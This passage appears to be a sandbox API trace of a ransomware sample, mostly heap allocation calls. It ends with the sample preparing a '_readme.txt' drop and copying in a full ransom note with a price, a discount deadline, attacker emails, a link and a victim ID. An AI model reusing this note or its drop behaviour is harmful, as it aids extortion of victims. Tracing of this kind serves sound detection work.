dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.994] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0201.000] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.000] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.000] PathFindFileNameW (pszPath="") returned="" [0201.000] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.001] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.001] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.007] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0201.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0201.007] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0201.007] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0201.007] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.007] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you 